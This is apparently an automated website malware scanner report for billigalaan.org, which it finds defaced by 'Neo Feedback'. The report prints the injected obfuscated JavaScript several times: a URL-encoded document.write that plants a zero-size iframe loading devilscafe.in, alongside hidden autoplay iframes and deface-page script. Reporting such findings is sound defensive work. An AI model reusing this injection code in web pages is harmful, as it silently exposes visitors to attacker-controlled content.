New scan:

Malware Scanner report for billigalaan.org

Malicious/Suspicious/Total urls checked
3/0/6
3 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/3/3
3 suspicious iframes found. See details below
Deface / Content modification
Found
Probably the website is defaced. The following signature was found:

Hacked by Neo Feedback  (86 websites defaced)

See details below

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://billigalaan.org/
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 21 Nov 2015 17:54:31 GMT
Location: http://www.billigalaan.org/
Server: Apache
Vary: Accept-Encoding
Content-Length: 235
Content-Type: text/html; charset=iso-8859-1
clean
http://www.billigalaan.org/
200 OK
Content-Length: 3460
Content-Type: text/html
suspicious
Malicious code - confirmed by antiviruses (see below)

document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%3Ciframe%20frameborder%3D%220%22%20height%3D%220%22%20src%3D%22http%3A//www.devilscafe.in%22%20%0A%0Awidth%3D%220%22%3E%3C/iframe%3E%0A%3Ca%20href%3D%22http%3A//www.devilscafe.in%22%20target%3D%22_blank%22%3E%3Cimg%20%0A%0Asrc%3D%22%22%20/%3E%22%29%29%3B%0A//--%3E%0A%3C/script%3E"));

Antivirus reports:

Avast
JS:Iframe-BCY [Trj]

Hidden iFrame found.
size: 0x0     
src: http://www.youtube.com/embed/40dt4cey0hy?&autoplay=1&rel=0&fs=0&start=7&showinfo=0&controls=0&autohide=1

<iframe width="0" height="0" src="http://www.youtube.com/embed/40dt4cey0hy?&autoplay=1&rel=0&fs=0&start=7&showinfo=0&controls=0&autohide=1" frameborder="0" allowfullscreen>

Deface/Content modification. The following signature was found: Hacked by Neo Feedback

<html>
<head>
<title>Hacked by Neo Feedback</title>
<link rel="icon" href="https://aronno1920.files.wordpress.com/2015/07/neofeedback.png" type="image/x-icon">
<script language="JavaScript">var brzinakucanja=200;var pauzapor=2000;var vremeid=null;var kretanje=false;var poruka=new Array();var slporuka=0;var bezporuke=0;poruka[0]="Hacked by Neo Feedback"
poruka[1]="Hacked by N30 F33D64CK"
function prikaz(){var text=poruka[slporuka];if(bezp
...[3417 bytes skipped]...


http://code.jquery.com/jquery-1.9.1.js
200 OK
Content-Length: 268381
Content-Type: application/javascript
clean
http://billigalaan.org/typed.js
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 21 Nov 2015 17:54:33 GMT
Location: http://www.billigalaan.org/typed.js
Server: Apache
Vary: Accept-Encoding
Content-Length: 243
Content-Type: text/html; charset=iso-8859-1
clean
http://www.billigalaan.org/typed.js
200 OK
Content-Length: 3460
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%3Ciframe%20frameborder%3D%220%22%20height%3D%220%22%20src%3D%22http%3A//www.devilscafe.in%22%20%0A%0Awidth%3D%220%22%3E%3C/iframe%3E%0A%3Ca%20href%3D%22http%3A//www.devilscafe.in%22%20target%3D%22_blank%22%3E%3Cimg%20%0A%0Asrc%3D%22%22%20/%3E%22%29%29%3B%0A//--%3E%0A%3C/script%3E"));

Antivirus reports:

Avast
JS:Iframe-BCY [Trj]

Hidden iFrame found.
size: 0x0     
src: http://www.youtube.com/embed/40dt4cey0hy?&autoplay=1&rel=0&fs=0&start=7&showinfo=0&controls=0&autohide=1

<iframe width="0" height="0" src="http://www.youtube.com/embed/40dt4cey0hy?&autoplay=1&rel=0&fs=0&start=7&showinfo=0&controls=0&autohide=1" frameborder="0" allowfullscreen>

http://www.billigalaan.org/test404page.js
200 OK
Content-Length: 3460
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%3Ciframe%20frameborder%3D%220%22%20height%3D%220%22%20src%3D%22http%3A//www.devilscafe.in%22%20%0A%0Awidth%3D%220%22%3E%3C/iframe%3E%0A%3Ca%20href%3D%22http%3A//www.devilscafe.in%22%20target%3D%22_blank%22%3E%3Cimg%20%0A%0Asrc%3D%22%22%20/%3E%22%29%29%3B%0A//--%3E%0A%3C/script%3E"));

Antivirus reports:

Avast
JS:Iframe-BCY [Trj]

Hidden iFrame found.
size: 0x0     
src: http://www.youtube.com/embed/40dt4cey0hy?&autoplay=1&rel=0&fs=0&start=7&showinfo=0&controls=0&autohide=1

<iframe width="0" height="0" src="http://www.youtube.com/embed/40dt4cey0hy?&autoplay=1&rel=0&fs=0&start=7&showinfo=0&controls=0&autohide=1" frameborder="0" allowfullscreen>


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: billigalaan.org

Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 21 Nov 2015 17:54:31 GMT
Location: http://www.billigalaan.org/
Server: Apache
Vary: Accept-Encoding
Content-Length: 235
Content-Type: text/html; charset=iso-8859-1

...235 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: billigalaan.org
Referer: http://www.google.com/search?q=billigalaan.org

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=billigalaan.org

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://billigalaan.org/

Result: billigalaan.org is not infected or malware details are not published yet.